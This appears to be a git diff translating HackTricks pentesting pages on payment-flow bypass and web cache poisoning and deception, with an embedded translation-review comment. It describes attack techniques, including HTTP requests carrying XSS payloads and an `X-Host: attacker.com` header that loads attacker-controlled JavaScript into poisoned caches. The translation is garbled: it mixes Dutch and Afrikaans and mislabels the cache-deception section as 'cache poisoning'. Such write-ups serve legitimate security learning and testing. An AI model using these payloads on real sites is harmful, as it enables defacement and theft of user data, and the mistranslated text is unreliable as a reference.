-### URL Analysis -If you encounter a parameter that contains a URL, especially one following the pattern _example.com/payment/MD5HASH_, it requires closer examination. Here's a step-by-step approach: +### URL-analise +As jy 'n parameter teëkom wat 'n URL bevat, veral een wat die patroon _example.com/payment/MD5HASH_ volg, vereis dit noukeurige ondersoek. Hier is 'n stap-vir-stap benadering: -1. **Copy the URL**: Extract the URL from the parameter value. -2. **New Window Inspection**: Open the copied URL in a new browser window. This action is critical for understanding the transaction's outcome. +1. **Kopieer die URL**: Haal die URL uit die parameterwaarde. +2. **Nuwe venster-inspeksie**: Maak die gekopieerde URL oop in 'n nuwe blaaier-venster. Hierdie aksie is krities om die uitkoms van die transaksie te verstaan. -### Parameter Manipulation -1. **Change Parameter Values**: Experiment by altering the values of parameters like _Success_, _Referrer_, or _Callback_. For instance, changing a parameter from `false` to `true` can sometimes reveal how the system handles these inputs. -2. **Remove Parameters**: Try removing certain parameters altogether to see how the system reacts. Some systems might have fallbacks or default behaviors when expected parameters are missing. +### Parametermanipulasie +1. **Verander parameterwaardes**: Eksperimenteer deur die waardes van parameters soos _Sukses_, _Verwysingsbron_ of _Terugroep_ te verander. Byvoorbeeld, deur 'n parameter van `false` na `true` te verander, kan dit soms onthul hoe die stelsel hierdie insette hanteer. +2. **Verwyder parameters**: Probeer om sekere parameters heeltemal te verwyder om te sien hoe die stelsel reageer. Sommige stelsels mag fallbacks of verstekgedrag hê wanneer verwagte parameters ontbreek. -### Cookie Tampering -1. **Examine Cookies**: Many websites store crucial information in cookies. Inspect these cookies for any data related to payment status or user authentication. -2. 
**Modify Cookie Values**: Alter the values stored in the cookies and observe how the website's response or behavior changes. +### Koekie-manipulasie +1. **Ondersoek koekies**: Baie webwerwe stoor belangrike inligting in koekies. Ondersoek hierdie koekies vir enige data wat verband hou met betalingsstatus of gebruikersverifikasie. +2. **Verander koekiewaardes**: Verander die waardes wat in die koekies gestoor word en let op hoe die webwerf se respons of gedrag verander. -### Session Hijacking -1. **Session Tokens**: If session tokens are used in the payment process, try capturing and manipulating them. This might give insights into session management vulnerabilities. +### Sessie-kaaping +1. **Sessie-tokens**: As sessie-tokens gebruik word in die betalingsproses, probeer om hulle vas te vang en te manipuleer. Dit kan insig gee in sessiebestuurskwesbaarhede. -### Response Tampering -1. **Intercept Responses**: Use tools to intercept and analyze the responses from the server. Look for any data that might indicate a successful transaction or reveal the next steps in the payment process. -2. **Modify Responses**: Attempt to modify the responses before they are processed by the browser or the application to simulate a successful transaction scenario. +### Responsmanipulasie +1. **Onderskep respons**: Gebruik gereedskap om die respons van die bediener te onderskep en te analiseer. Soek na enige data wat 'n suksesvolle transaksie kan aandui of die volgende stappe in die betalingsproses kan onthul. +2. **Verander respons**: Probeer om die respons voor verwerking deur die blaaier of die toepassing te verander om 'n suksesvolle transaksiesituasie te simuleer.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} @@ -63,16 +63,14 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
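Review bot: in the Payment Bypass hunks the literal parameter names `Success`, `Referrer` and `Callback` have been translated to `Sukses`, `Verwysingsbron` and `Terugroep`; they are identifiers the tester is told to look for in intercepted requests (the Parameter Manipulation list italicises them as such), so they should stay in English, optionally with a gloss in parentheses. Several headings and phrases also read as non-idiomatic or mistranslated: `### Versoek Onderbreking` means "request interruption" rather than interception (the body itself uses "onderskep"), so `### Versoekonderskepping` fits better; `## Bypas Betalings Tegnieke` would read more naturally as `## Tegnieke om betalings te omseil`; `### Sessie-kaaping` should be `### Sessiekaping`; and "alle versoek" / "Binne hierdie versoek" need the plural "versoeke". Minor consistency points: "fallbacks" is left in English, and `SUBSCRIPTION PLANS` is left untranslated here while the cache-deception.md hunk in the same patch translates it.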
- - diff --git a/pentesting-web/cache-deception.md b/pentesting-web/cache-deception.md index c06dbc526..bcb37b906 100644 --- a/pentesting-web/cache-deception.md +++ b/pentesting-web/cache-deception.md @@ -1,233 +1,199 @@ -# Cache Poisoning and Cache Deception +# Cache-vergiftiging en Cache-misleiding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF-formaat**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om eenvoudig workflows te bouwen en te automatiseren met behulp van 's werelds meest geavanceerde communitytools.\ +Krijg vandaag nog toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## The difference +## Het verschil -> **What is the difference between web cache poisoning and web cache deception?** +> **Wat is het verschil tussen cache-vergiftiging en cache-misleiding?** > -> * In **web cache poisoning**, the attacker causes the application to store some malicious content in the cache, and this content is served from the cache to other application users. -> * In **web cache deception**, the attacker causes the application to store some sensitive content belonging to another user in the cache, and the attacker then retrieves this content from the cache. +> * Bij **cache-vergiftiging** zorgt de aanvaller ervoor dat de applicatie schadelijke inhoud in de cache opslaat, en deze inhoud wordt vanuit de cache aan andere gebruikers van de applicatie geserveerd. +> * Bij **cache-misleiding** zorgt de aanvaller ervoor dat de applicatie gevoelige inhoud van een andere gebruiker in de cache opslaat, en de aanvaller haalt vervolgens deze inhoud uit de cache. -## Cache Poisoning +## Cache-vergiftiging -Cache poisoning is aimed at manipulating the client-side cache to force clients to load resources that are unexpected, partial, or under the control of an attacker. The extent of the impact is contingent on the popularity of the affected page, as the tainted response is served exclusively to users visiting the page during the period of cache contamination. 
+Cache-vergiftiging is gericht op het manipuleren van de cache aan de clientzijde om clients te dwingen onverwachte, gedeeltelijke of door een aanvaller gecontroleerde bronnen te laden. De omvang van de impact is afhankelijk van de populariteit van de getroffen pagina, aangezien de besmette respons uitsluitend wordt geserveerd aan gebruikers die de pagina bezoeken tijdens de periode van cache-verontreiniging. -The execution of a cache poisoning assault involves several steps: +De uitvoering van een cache-vergiftigingsaanval omvat verschillende stappen: -1. **Identification of Unkeyed Inputs**: These are parameters that, although not required for a request to be cached, can alter the response returned by the server. Identifying these inputs is crucial as they can be exploited to manipulate the cache. - -2. **Exploitation of the Unkeyed Inputs**: After identifying the unkeyed inputs, the next step involves figuring out how to misuse these parameters to modify the server's response in a way that benefits the attacker. +1. **Identificatie van niet-geïndexeerde invoer**: Dit zijn parameters die, hoewel niet vereist voor een verzoek om in de cache te worden opgeslagen, de respons die door de server wordt teruggestuurd kunnen wijzigen. Het identificeren van deze invoer is cruciaal, omdat ze kunnen worden misbruikt om de cache te manipuleren. -3. **Ensuring the Poisoned Response is Cached**: The final step is to ensure that the manipulated response is stored in the cache. This way, any user accessing the affected page while the cache is poisoned will receive the tainted response. +2. **Misbruik van de niet-geïndexeerde invoer**: Nadat de niet-geïndexeerde invoer is geïdentificeerd, omvat de volgende stap het achterhalen van hoe deze parameters kunnen worden misbruikt om de respons van de server op een manier te wijzigen die de aanvaller ten goede komt. -### Discovery: Check HTTP headers +3. 
**Zorgen dat de vergiftigde respons in de cache wordt opgeslagen**: De laatste stap is ervoor te zorgen dat de gemanipuleerde respons in de cache wordt opgeslagen. Op deze manier ontvangt elke gebruiker die de getroffen pagina bezoekt terwijl de cache is vergiftigd, de besmette respons. -Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers). +### Ontdekking: Controleer HTTP-headers -### Discovery: Caching 400 code +Gewoonlijk is er bij een respons die **in de cache is opgeslagen** een **header die dit aangeeft**, je kunt controleren op welke headers je moet letten in deze post: [**HTTP-cacheheaders**](../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers). -If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).\ -A badly configured header could be just `\:` as a header.\ -_Note that sometimes these kinds of status codes aren't cached so this test will be useless._ +### Ontdekking: Caching van code 400 -### Discovery: Identify and evaluate unkeyed inputs +Als je denkt dat de respons in een cache wordt opgeslagen, kun je proberen **verzoeken te verzenden met een slechte header**, waarop normaal gesproken wordt gereageerd met een **statuscode 400**. 
Probeer vervolgens het verzoek normaal te openen en als de **respons een statuscode 400 is**, weet je dat het kwetsbaar is (en je kunt zelfs een DoS uitvoeren).\ +Een slecht geconfigureerde header kan gewoon `\:` als een header zijn.\ +Merk op dat deze soorten statuscodes soms niet in de cache worden opgeslagen, dus deze test is nutteloos. -You could use [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) to **brute-force parameters and headers** that may be **changing the response of the page**. For example, a page may be using the header `X-Forwarded-For` to indicate the client to load the script from there: +### Ontdekking: Identificeer en evalueer niet-geïndexeerde invoer +Je kunt [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) gebruiken om parameters en headers te **brute-forcen** die mogelijk de respons van de pagina **veranderen**. Bijvoorbeeld, een pagina kan de header `X-Forwarded-For` gebruiken om aan te geven dat de client het script van daar moet laden: ```markup ``` +### Lokaliseer 'n skadelike reaksie van die agterste bediener -### Elicit a harmful response from the back-end server +Met die geïdentifiseerde parameter/header, ondersoek hoe dit **gesaniteer** word en **waar** dit die respons van die header **beïnvloed**. Kan jy dit enigsins misbruik (voer 'n XSS uit of laai 'n JS-kode wat deur jou beheer word? Voer 'n DoS uit?...) -With the parameter/header identified check how it is being **sanitised** and **where** is it **getting reflected** or affecting the response from the header. Can you abuse it anyway (perform an XSS or load a JS code controlled by you? perform a DoS?...) +### Kry die gekasheerde respons -### Get the response cached +Sodra jy die **bladsy** geïdentifiseer het wat misbruik kan word, asook die **parameter**/**header** wat gebruik moet word en **hoe** om dit te **misbruik**, moet jy die bladsy gekasheer kry. 
Afhangende van die bron wat jy in die kas wil kry, kan dit 'n rukkie neem en jy moet dalk vir verskeie sekondes probeer.\ +Die **`X-Cache`**-header in die respons kan baie nuttig wees, aangesien dit die waarde **`miss`** kan hê wanneer die versoek nie gekasheer is nie, en die waarde **`hit`** wanneer dit gekasheer is.\ +Die **`Cache-Control`**-header is ook interessant om te weet of 'n bron gekasheer word en wanneer die volgende keer sal wees dat die bron weer gekasheer sal word: `Cache-Control: public, max-age=1800`\ +'n Ander interessante header is **`Vary`**. Hierdie header word dikwels gebruik om **bykomende headers aan te dui** wat as **deel van die kas-sleutel** beskou word, selfs al is hulle normaalweg nie sleutelwaardig nie. Daarom kan die gebruiker, as hy die `User-Agent` van die slagoffer ken, die kas vergiftig vir gebruikers wat daardie spesifieke `User-Agent` gebruik.\ +'n Nog 'n header wat verband hou met die kas is **`Age`**. Dit definieer die tyd in sekondes wat die voorwerp in die proxy-kas was. -Once you have **identified** the **page** that can be abused, which **parameter**/**header** to use and **how** to **abuse** it, you need to get the page cached. Depending on the resource you are trying to get in the cache this could take some time, you might need to be trying for several seconds.\ -The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\ -The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`\ -Another interesting header is **`Vary`**. This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. 
Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.\ -One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache. +Wees **versigtig met die headers** wat jy gebruik wanneer jy 'n versoek kashier, omdat sommige van hulle **onverwags as sleutelwaardig gebruik kan word** en die slagoffer dieselfde header moet gebruik. Toets altyd 'n Kasvergiftiging met **verskillende webblaaie** om te sien of dit werk. -When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working. +## Voorbeelde van uitbuiting -## Exploiting Examples - -### Easiest example - -A header like `X-Forwarded-For` is being reflected in the response unsanitized.\ -You can send a basic XSS payload and poison the cache so everybody that accesses the page will be XSSed: +### Maklikste voorbeeld +'n Header soos `X-Forwarded-For` word ongesaniteer in die respons weerspieël.\ +Jy kan 'n basiese XSS-lading stuur en die kas vergiftig sodat almal wat die bladsy besoek, XSS sal ervaar: ```markup GET /en?region=uk HTTP/1.1 Host: innocent-website.com X-Forwarded-Host: a.">" ``` +_Merk op dat dit 'n versoek na `/en?region=uk` sal vergiftig en nie na `/en` nie_ -_Note that this will poison a request to `/en?region=uk` not to `/en`_ - -### Using web cache poisoning to exploit cookie-handling vulnerabilities - -Cookies could also be reflected on the response of a page. If you can abuse it to cause an XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response. +### Gebruik van webgeheuevergiftiging om koekiehanteringskwesbaarhede uit te buit +Koekies kan ook weerspieël word in die respons van 'n bladsy. 
As jy dit kan misbruik om byvoorbeeld 'n XSS te veroorsaak, kan jy XSS moontlik uitbuit in verskeie kliënte wat die skadelike geheue-respons laai. ```markup GET / HTTP/1.1 Host: vulnerable.com Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b" ``` +Let daarop dat as die kwesbare koekie baie deur die gebruikers gebruik word, sal gereelde versoekskakeling die cache skoonmaak. -Note that if the vulnerable cookie is very used by the users, regular requests will be cleaning the cache. - -### Using multiple headers to exploit web cache poisoning vulnerabilities - -Sometimes you will need to **exploit several unkeyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as the domain name for the redirect. You can control where the page is pointed by the redirect. +### Gebruik van verskeie koptekste om webkaskadevergiftigingskwesbaarhede uit te buit +Soms sal jy verskeie ongekenmerkte insette moet uitbuit om 'n kaskade te misbruik. Byvoorbeeld, jy kan 'n **Oop omleiding** vind as jy `X-Forwarded-Host` instel op 'n deur jou beheerde domein en `X-Forwarded-Scheme` op `http`. **As** die **bediener** al die **HTTP**-versoeke **na HTTPS stuur** en die koptekser `X-Forwarded-Scheme` gebruik as die domeinnaam vir die omleiding. Jy kan beheer waarheen die bladsy verwys word deur die omleiding. 
```markup GET /resources/js/tracking.js HTTP/1.1 Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/ X-Forwarded-Scheme: http ``` +### Uitbuiting met beperkte `Vary`-header -### Exploiting with limited `Vary`header - -If you found that the **`X-Host`** header is being used as **domain name to load a JS resource** but the **`Vary`** header in the response is indicating **`User-Agent`**. Then, you need to find a way to exfiltrate the User-Agent of the victim and poison the cache using that user agent: - +As jy vind dat die **`X-Host`**-header gebruik word as **domeinnaam om 'n JS-hulpbron te laai**, maar die **`Vary`**-header in die respons dui op **`User-Agent`**, moet jy 'n manier vind om die User-Agent van die slagoffer uit te voer en die cache te vergiftig deur daardie gebruikersagent te gebruik: ```markup GET / HTTP/1.1 Host: vulnerbale.net User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM X-Host: attacker.com ``` +### Uitbuiting van HTTP-cachevergiftiging door misbruik van HTTP Request Smuggling -### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling +Leer hier hoe je [Cachevergiftigingsaanvallen kunt uitvoeren door misbruik te maken van HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning). -Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning). +### Geautomatiseerde testen voor Web Cache-vergiftiging -### Automated testing for Web Cache Poisoning +De [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) kan worden gebruikt om automatisch te testen op web cache-vergiftiging. Het ondersteunt veel verschillende technieken en is zeer aanpasbaar. 
-The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) can be used to automatically test for web cache poisoning. It supports many different techniques and is highly customizable. - -Example usage: `wcvs -u example.com` +Voorbeeldgebruik: `wcvs -u example.com`
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om eenvoudig workflows te bouwen en te automatiseren met behulp van 's werelds meest geavanceerde communitytools.\ +Krijg vandaag nog toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Vulnerable Examples +## Kwetsbare voorbeelden ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577)) -ATS forwarded the fragment inside the URL without stripping it and generated the cache key only using the host, path and query (ignoring the fragment). So the request `/#/../?r=javascript:alert(1)` was sent to the backend as `/#/../?r=javascript:alert(1)` and the cache key didn't have the payload inside of it, only host, path and query. +ATS stuurde het fragment in de URL door zonder het te verwijderen en genereerde de cache-sleutel alleen met behulp van de host, het pad en de query (waarbij het fragment werd genegeerd). Dus het verzoek `/#/../?r=javascript:alert(1)` werd naar de backend gestuurd als `/#/../?r=javascript:alert(1)` en de cache-sleutel bevatte de payload niet, alleen de host, het pad en de query. ### GitHub CP-DoS -Sending a bad value in the content-type header triggered a 405 cached response. The cache key contained the cookie so it was possible only to attack unauth users. +Het verzenden van een verkeerde waarde in de content-type header activeerde een 405 gecachte respons. De cache-sleutel bevatte de cookie, dus het was alleen mogelijk om niet-geauthenticeerde gebruikers aan te vallen. ### GitLab + GCP CP-DoS -GitLab uses GCP buckets to store static content. 
**GCP Buckets** support the **header `x-http-method-override`**. So it was possible to send the header `x-http-method-override: HEAD` and poison the cache into returning an empty response body. It could also support the method `PURGE`. +GitLab gebruikt GCP-buckets om statische inhoud op te slaan. **GCP Buckets** ondersteunen de **header `x-http-method-override`**. Het was dus mogelijk om de header `x-http-method-override: HEAD` te verzenden en de cache te vergiftigen zodat een lege responsbody werd geretourneerd. Het kon ook de methode `PURGE` ondersteunen. ### Rack Middleware (Ruby on Rails) -In Ruby on Rails applications, Rack middleware is often utilized. The purpose of the Rack code is to take the value of the **`x-forwarded-scheme`** header and set it as the request's scheme. When the header `x-forwarded-scheme: http` is sent, a 301 redirect to the same location occurs, potentially causing a Denial of Service (DoS) to that resource. Additionally, the application might acknowledge the `X-forwarded-host` header and redirect users to the specified host. This behavior can lead to the loading of JavaScript files from an attacker's server, posing a security risk. +In Ruby on Rails-toepassingen wordt vaak gebruik gemaakt van Rack-middleware. Het doel van de Rack-code is om de waarde van de **`x-forwarded-scheme`** header te nemen en deze als het schema van het verzoek in te stellen. Wanneer de header `x-forwarded-scheme: http` wordt verzonden, vindt er een 301-omleiding naar dezelfde locatie plaats, wat mogelijk kan leiden tot een Denial of Service (DoS) voor die bron. Bovendien kan de applicatie de `X-forwarded-host` header herkennen en gebruikers doorverwijzen naar de opgegeven host. Dit gedrag kan leiden tot het laden van JavaScript-bestanden vanaf de server van een aanvaller, wat een beveiligingsrisico vormt. -### 403 and Storage Buckets +### 403 en Storage Buckets -Cloudflare previously cached 403 responses. 
Attempting to access S3 or Azure Storage Blobs with incorrect Authorization headers would result in a 403 response that got cached. Although Cloudflare has stopped caching 403 responses, this behavior might still be present in other proxy services. +Cloudflare heeft eerder 403-responses in de cache opgeslagen. Als er werd geprobeerd om toegang te krijgen tot S3- of Azure Storage Blobs met onjuiste Autorisatie-headers, resulteerde dit in een 403-respons die werd gecachet. Hoewel Cloudflare is gestopt met het cachen van 403-responses, kan dit gedrag nog steeds aanwezig zijn in andere proxy-services. -### Injecting Keyed Parameters +### Injecteren van gesleutelde parameters -Caches often include specific GET parameters in the cache key. For instance, Fastly's Varnish cached the `size` parameter in requests. However, if a URL-encoded version of the parameter (e.g., `siz%65`) was also sent with an erroneous value, the cache key would be constructed using the correct `size` parameter. Yet, the backend would process the value in the URL-encoded parameter. URL-encoding the second `size` parameter led to its omission by the cache but its utilization by the backend. Assigning a value of 0 to this parameter resulted in a cacheable 400 Bad Request error. +Caches bevatten vaak specifieke GET-parameters in de cache-sleutel. Bijvoorbeeld, Fastly's Varnish cachte de `size` parameter in verzoeken. Als echter een URL-gecodeerde versie van de parameter (bijv. `siz%65`) ook werd verzonden met een onjuiste waarde, zou de cache-sleutel worden geconstrueerd met behulp van de juiste `size` parameter. Maar de backend zou de waarde verwerken in de URL-gecodeerde parameter. Het URL-coderen van de tweede `size` parameter leidde ertoe dat deze door de cache werd weggelaten maar door de backend werd gebruikt. Het toewijzen van een waarde van 0 aan deze parameter resulteerde in een cachebare 400 Bad Request-fout. 
-### User Agent Rules +### User Agent-regels -Some developers block requests with user-agents matching those of high-traffic tools like FFUF or Nuclei to manage server load. Ironically, this approach can introduce vulnerabilities such as cache poisoning and DoS. +Sommige ontwikkelaars blokkeren verzoeken met user-agents die overeenkomen met die van veelgebruikte tools zoals FFUF of Nuclei om de serverbelasting te beheren. Ironisch genoeg kan deze aanpak kwetsbaarheden introduceren zoals cachevergiftiging en DoS. -### Illegal Header Fields +### Onwettige header-velden -The [RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) specifies the acceptable characters in header names. Headers containing characters outside of the specified **tchar** range should ideally trigger a 400 Bad Request response. In practice, servers don't always adhere to this standard. A notable example is Akamai, which forwards headers with invalid characters and caches any 400 error, as long as the `cache-control` header is not present. An exploitable pattern was identified where sending a header with an illegal character, such as `\`, would result in a cacheable 400 Bad Request error. +De [RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) specificeert de acceptabele tekens in kopernamen. Headers die tekens bevatten buiten het gespecificeerde **tchar**-bereik zouden idealiter een 400 Bad Request-respons moeten activeren. In de praktijk houden servers zich echter niet altijd aan deze standaard. Een opmerkelijk voorbeeld hiervan is Akamai, dat headers met ongeldige tekens doorstuurt en elke 400-fout in de cache plaatst, zolang de `cache-control` header niet aanwezig is. Er werd een uitbuitbaar patroon geïdentificeerd waarbij het verzenden van een header met een ongeldig teken, zoals `\`, zou resulteren in een cachebare 400 Bad Request-fout. 
-### Finding new headers +### Het vinden van nieuwe headers [https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6) -## Cache Deception +## Cachevergiftiging -The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**. +Het doel van Cachevergiftiging is om clients **bronnen te laten laden die worden opgeslagen door de cache met hun gevoelige informatie**. -First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache.** Therefore, if you access `www.example.com/profile.php/nonexistent.js` the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users. +Allereerst moet worden opgemerkt dat **extensies** zoals `.css`, `.js`, `.png`, enz. meestal zijn **geconfigureerd** om te worden **opgeslagen** in de **cache**. Daarom, als je toegang krijgt tot `www.example.com/profile.php/nonexistent.js`, zal de cache waarschijnlijk de respons opslaan omdat het de extensie `.js` ziet. Maar als de **applicatie** de **gevoelige** gebruikersinhoud die is opgeslagen in _www.example.com/profile.php_ herhaalt, kun je die inhoud stelen van andere gebruikers. 
-Other things to test: +Andere dingen om te testen: * _www.example.com/profile.php/.js_ * _www.example.com/profile.php/.css_ * _www.example.com/profile.php/test.js_ * _www.example.com/profile.php/../test.js_ * _www.example.com/profile.php/%2e%2e/test.js_ -* _Use lesser known extensions such as_ `.avif` +* _Gebruik minder bekende extensies zoals_ `.avif` -Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\ -In the example, it is explained that if you load a non-existent page like _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ (**with the user's sensitive information**) is going to be returned and the cache server is going to save the result.\ -Then, the **attacker** can access _http://www.example.com/home.php/non-existent.css_ in their own browser and observe the **confidential information** of the users that accessed before. +Een ander zeer duidelijk voorbeeld is te vinden in deze write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\ +In het voorbeeld wordt uitgelegd dat als je een niet-bestaande pagina laadt zoals _http://www.example.com/home.php/non-existent.css_, de inhoud van _http://www.example.com/home.php_ (**met de gevoelige informatie van de gebruikers**) zal worden geretourneerd en de cache-server zal het resultaat opslaan.\ +Vervolgens kan de **aanvaller** toegang krijgen tot _http://www.example.com/home.php/non-existent.css_ in hun eigen browser en de **vertrouwelijke informatie** van de gebruikers die eerder toegang hebben gekregen, observeren. -Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file). 
